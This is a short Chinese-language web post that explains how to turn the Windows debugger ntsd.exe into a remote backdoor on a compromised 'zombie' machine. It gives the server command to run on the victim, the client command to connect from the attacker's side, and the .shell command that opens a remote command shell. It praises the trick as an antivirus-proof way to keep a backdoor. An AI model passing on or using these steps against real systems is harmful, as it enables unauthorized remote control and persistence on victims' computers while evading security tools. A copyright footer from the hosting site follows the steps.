1.肉雞上運行：ntsd -server tcp:port=端口 要調(diào)試的程序（可以任意，只要存在即可），例如：ntsd -server tcp:port=99 calc.exe，會新彈出個窗口，并監(jiān)聽剛才設(shè)置端口。

2.本機運行：ntsd -remote tcp:server=IP,port=端口，例如：ntsd -remote tcp:server=192.168.1.1,port=99。會彈出一個窗口。如果參數(shù)填寫正確的話，會連接上目標(biāo)機器，會顯示命令類似提示符的界面，同時 server 端（就是第一步監(jiān)聽的那個）會顯示：0:000> COMPUTER\netbar (tcp 192.168.1.3, port 99) connected at Fri May 06 13:49:59 2011，表示有人連接了，同時還顯示連接的機器名，用戶名，連接類型，IP地址，端口，時間等信息。

3.輸入：.shell，取得 shell，操作和 Cmd 完全一樣，權(quán)限是服務(wù)端運行ntsd.exe的用戶權(quán)限。

又是個留后門的好方法，全免殺，而且永不被殺……

這個其實是 NTSD.exe 的正常功能，遠程調(diào)試功能，更多說明自己谷歌搜索，這是一個 windows 命令行下的調(diào)試工具，功能十分強大。

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。